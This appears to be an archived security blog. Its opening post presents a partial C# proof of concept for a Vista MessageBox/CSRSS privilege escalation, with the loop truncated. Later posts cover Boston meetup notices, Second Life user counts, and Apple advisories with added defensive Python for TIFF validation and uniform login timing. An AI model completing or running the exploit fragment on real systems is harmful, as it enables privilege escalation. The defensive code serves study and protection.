
Vista exploit code

Feel free to send 50k to my paypal account :)

Russian sites are starting to post proof-of-concept code now. I had little idea how trivial this exploit would be to understand, but it seems that error-message parameters are used to elevate privileges: if the MB_SERVICE_NOTIFICATION flag is specified when calling the MessageBox function from the Windows API, it uses the NtRaiseHardError syscall to send a HardError message to CSRSS.

    // C# variant
    // mbox.cs
    using System;
    using System.Runtime.InteropServices;
    class HelloWorldFromMicrosoft
    {
        [DllImport("user32.dll")]
        unsafe public static extern int MessageBoxA(uint hwnd, byte* lpText, byte* lpCaption, uint uType);

        static unsafe void Main()
        {
            // the NUL-terminated ANSI string "\??\!!!"
            byte[] helloBug = new byte[] {0x5C, 0x3F, 0x3F, 0x5C, 0x21, 0x21, 0x21, 0x00};
            uint MB_SERVICE_NOTIFICATION = 0x00200000u;
            fixed(byte* pHelloBug = &helloBug[0])
            {
                for(int i=0; i   // the rest of the loop and the closing braces were lost when the post was archived; see the picture below

Build and run:

    >> csc /unsafe mbox.cs
    >> mbox.exe

The original exploit code I found was impossible to paste into this blog, so I'm uploading a picture of it.

[image: msgbox exploit PoC]

BeanSec! December 20th 6-9pm…

We’ve now established a regular schedule for the BeanSec! events: the third Wednesday of each month. So you can mark your calendars now for December 20th at 567 Massachusetts Ave, upstairs at the Enormous Room, from 6-9pm.

For the uninitiated:

BeanSec! is an informal meetup of information security professionals and academics in the Cambridge/Boston area. Unlike other meetings, you will not be expected to pay dues, “join up”, present a zero-day exploit, or defend your dissertation to attend.

The location is the Enormous Room (map) in Cambridge.

Beansec now on a regular schedule

Andy J had a really good point: Beansec was just too unpredictable to make plans for, and our erratic releases of information were just a little *too* spontaneous. So to appease him and the good folks at Matasano, the two Chrises and I have decided that all future Beansec events will occur on the third Wednesday of the month.

That’s right, every third Wednesday. So you can mark your calendars now for December 20th at 567 Massachusetts Ave Upstairs at the Enormous Room from 6-9pm.

Beansec 3 is November 29th (Wed)

Full of turkey (or unTurkey) and want to get out and meet other infosec professionals? I confirmed with our awesome host the Enormous Room that we have use of the upstairs area November 29th from 6pm – 9pm. So please come out and meet up with other infosec professionals in the Boston area. If you came out on the 15th please let me know and the first beer/whatever is on me.

Beansec 3 is (Soon)

Due to unforeseen circumstances the third ever BeanSec! event is going to be moved to a later date. Likely sometime this month. Stay tuned while Chris, Chris, and I come up with a new plan!

Beansec 3 arrives Nov 15th

Everyone’s favorite Boston Security event is coming back to the Enormous Room on November 15th. That’s Wednesday from 6pm to sometime around 9pm or so. This event is also doubling as a birthday party for yours truly and I will likely stay late into the night. (Dave G, this is the one you should come to Boston for!)

Beansec 2 grows by over 100%

Thanks to everyone who came to Beansec 2! I lost track of the number of people around 14 (Hoff says he counted at least 16) but the sheer amount of new faces was awesome. The next Beansec is currently planned for October 25th at the Enormous Room. Don’t forget to add yourself to the mailing list beansec [at] socketpuppet [dot] org. Also for those who were interested in participating in the security vulnerability research project I spoke about feel free to email me directly at oday [at] fas [dot] harvard

BeanSec2 Announcement

An informal meetup of Boston area infosec professionals at the Enormous Room on Sept 27th.

Let us know you are coming! mail to: beansec [at] sockpuppet [dot] org

Second Life Population

A group of people who only exist in an online simulation.

400k
by Frans Charming

400k users on the front page, I’m 13 days off on my prediction that we would reach it on the end of July. But what does such a number say anyway, if it is constantly redefined as it has been again on the LL blog.

“The number that is currently on our home page is a time-weighted average between “total number of sign ups ever” and “total number of logged in users over the last 60 days”. As of right now, those numbers are 493,563 and 225,028.”

Hi, I’m a Mac

And I can get 0wned just like you, PC.

* ImageIO

CVE-ID: CVE-2006-3459, CVE-2006-3461, CVE-2006-3462, CVE-2006-3465

Available for: Mac OS X v10.4.7 Build 8K1079, Mac OS X Server v10.4.7 Build 8K1079

Impact: Viewing a maliciously-crafted TIFF image may lead to an application crash or arbitrary code execution

Description: Buffer overflows were discovered in TIFF tag handling (CVE-2006-3459, CVE-2006-3465), the TIFF PixarLog decoder (CVE-2006-3461), and the TIFF NeXT RLE decoder (CVE-2006-3462). By carefully crafting a corrupt TIFF image, an attacker can trigger a buffer overflow which may lead to an application crash or arbitrary code execution. This update addresses the issue by performing additional validation of TIFF images. Systems prior to Mac OS X v10.4 are affected only by the TIFF NeXT RLE decoder issue (CVE-2006-3462). Credit to Tavis Ormandy, Google Security Team for reporting this issue.

Note: A fifth issue discovered by Tavis Ormandy, CVE-2006-3460, does not affect Mac OS X.
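The advisory says the fix was "additional validation of TIFF images", which in practice means checking every count and offset in the image's tag table against the size of the file before reading through it. The following is an added illustration written for this post, not Apple's or libtiff's code: a small parser for the first IFD of a TIFF that refuses any entry whose value would lie outside the buffer. The two sample files are constructed inline; the benign one carries a single ImageWidth tag, the malformed one declares an ImageDescription of 0x7FFFFFFF bytes at offset 8, the kind of oversized claim that turns into a buffer overflow when a C decoder trusts it.

```python
import struct

class TiffError(ValueError):
    """Raised for any structure that would read outside the file buffer."""

# Byte size of each TIFF field type (TIFF 6.0, section 2).
TYPE_SIZES = {1: 1, 2: 1, 3: 2, 4: 4, 5: 8, 6: 1, 7: 1, 8: 2, 9: 4, 10: 8, 11: 4, 12: 8}

def parse_tiff_tags(data: bytes):
    """Return the entries of the first IFD, or raise TiffError.

    Every offset and length is checked against len(data) before it is used;
    this is the validation step the advisory describes the update as adding.
    """
    if len(data) < 8:
        raise TiffError("header too short")
    order = data[:2]
    if order == b"II":
        end = "<"
    elif order == b"MM":
        end = ">"
    else:
        raise TiffError("bad byte-order mark")
    magic, ifd_off = struct.unpack(end + "HI", data[2:8])
    if magic != 42:
        raise TiffError("bad magic number")
    if ifd_off < 8 or ifd_off + 2 > len(data):
        raise TiffError("IFD offset out of range")
    (count,) = struct.unpack(end + "H", data[ifd_off:ifd_off + 2])
    entries_end = ifd_off + 2 + 12 * count
    if entries_end + 4 > len(data):          # entries plus the next-IFD pointer
        raise TiffError("IFD entry table runs past end of file")
    tags = []
    for i in range(count):
        off = ifd_off + 2 + 12 * i
        tag, typ, cnt = struct.unpack(end + "HHI", data[off:off + 8])
        size = TYPE_SIZES.get(typ)
        if size is None:
            raise TiffError("tag %d: unknown field type %d" % (tag, typ))
        total = size * cnt   # in C this product must itself be checked for overflow
        if total <= 4:
            value = data[off + 8:off + 8 + total]   # value is stored inline
        else:
            (voff,) = struct.unpack(end + "I", data[off + 8:off + 12])
            if voff + total > len(data):
                raise TiffError("tag %d: %d bytes at offset %d exceed the file" % (tag, total, voff))
            value = data[voff:voff + total]
        tags.append({"tag": tag, "type": typ, "count": cnt, "value": value})
    return tags

def is_well_formed(data: bytes) -> bool:
    """True if the first IFD parses with every reference inside the buffer."""
    try:
        parse_tiff_tags(data)
        return True
    except TiffError:
        return False

def build_tiff(entries, trailing=b""):
    """Build a little-endian TIFF with one IFD right after the header (constructed sample data)."""
    ifd = struct.pack("<H", len(entries))
    for tag, typ, cnt, val4 in entries:
        ifd += struct.pack("<HHI", tag, typ, cnt) + val4
    ifd += struct.pack("<I", 0)   # no further IFD
    return b"II" + struct.pack("<HI", 42, 8) + ifd + trailing

# Constructed samples: a benign file whose ImageWidth (tag 256, SHORT) is 100, and a
# malformed one whose ImageDescription (tag 270, ASCII) claims 0x7FFFFFFF bytes at offset 8.
GOOD_TIFF = build_tiff([(256, 3, 1, struct.pack("<H", 100) + b"\0\0")])
BAD_TIFF = build_tiff([(270, 2, 0x7FFFFFFF, struct.pack("<I", 8))])

if __name__ == "__main__":
    print(parse_tiff_tags(GOOD_TIFF))
    print("malformed file accepted?", is_well_formed(BAD_TIFF))
```

The point of the `total = size * cnt` line is that Python integers cannot overflow, but the same multiplication in a C decoder can wrap to a small number and pass a naive length check; a real fix has to bound both factors, not just their product.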

* OpenSSH

CVE-ID: CVE-2006-0393

Available for: Mac OS X v10.4.7 Build 8K1079, Mac OS X Server v10.4.7 Build 8K1079

Impact: When remote login is enabled, remote attackers may cause a denial of service or determine whether an account exists

Description: Attempting to log in to an OpenSSH server (“Remote Login”) using a nonexistent account causes the authentication process to hang. An attacker can exploit this behavior to detect the existence of a particular account. A large number of such attempts may lead to a denial of service. This update addresses the issue by properly handling attempted logins by nonexistent users. This issue does not affect systems prior to Mac OS X v10.4. Credit to Rob Middleton of the Centenary Institute (Sydney, Australia) for reporting this issue.
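The OpenSSH issue above is an account-existence oracle: the server behaves observably differently (here, it hangs) depending on whether the user name exists. The added example below is written for this post and is not Apple's or OpenSSH's code; it generalizes the advisory to any behavioural difference, fast or slow, by contrasting a login routine that short-circuits on unknown users with one that takes an identical path for every name. The credential store, the user "alice" and the decoy credential are all constructed for the example; `Work` and `hashes_spent` are hypothetical helpers that count the slow hash operations so the two paths can be compared without relying on wall-clock timing.

```python
import hashlib
import hmac
import secrets

def _hash_password(password: str, salt: bytes) -> bytes:
    # PBKDF2 stands in for whatever slow hash the real system uses.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 20_000)

# Constructed credential store: "alice" is the only account that exists.
_ALICE_SALT = b"constructed-salt-alice"
USERS = {"alice": (_ALICE_SALT, _hash_password("correct horse battery", _ALICE_SALT))}

# Decoy credential for unknown user names: random salt and random password, so the
# comparison can never succeed, but the same amount of work is always done.
_DECOY_SALT = secrets.token_bytes(16)
_DECOY = (_DECOY_SALT, _hash_password(secrets.token_hex(16), _DECOY_SALT))

class Work:
    """Counts slow operations so the two code paths can be compared (hypothetical helper)."""
    def __init__(self):
        self.hashes = 0

def login_leaky(user: str, password: str, work: Work) -> bool:
    """Unknown users return immediately; known users pay for a hash.
    The response time (or, in the advisory's case, a hang) therefore reveals
    whether the account exists."""
    if user not in USERS:
        return False
    salt, stored = USERS[user]
    work.hashes += 1
    return hmac.compare_digest(_hash_password(password, salt), stored)

def login_uniform(user: str, password: str, work: Work) -> bool:
    """Every attempt takes the same path: look up a credential (real or decoy),
    hash once, compare in constant time, and only then apply the existence check."""
    salt, stored = USERS.get(user, _DECOY)
    work.hashes += 1
    matched = hmac.compare_digest(_hash_password(password, salt), stored)
    return matched and user in USERS

def hashes_spent(login, user: str, password: str) -> int:
    """How many slow hashes one login attempt costs; a per-user difference is an oracle."""
    work = Work()
    login(user, password, work)
    return work.hashes

if __name__ == "__main__":
    for name in ("alice", "nobody"):
        print(name, "leaky:", hashes_spent(login_leaky, name, "wrong"),
              "uniform:", hashes_spent(login_uniform, name, "wrong"))
```

The decoy lookup is what keeps the unknown-user path from being distinguishable; the final `and user in USERS` is cheap and runs after the expensive work, so it cannot turn a decoy match into a successful login nor change how long the attempt takes.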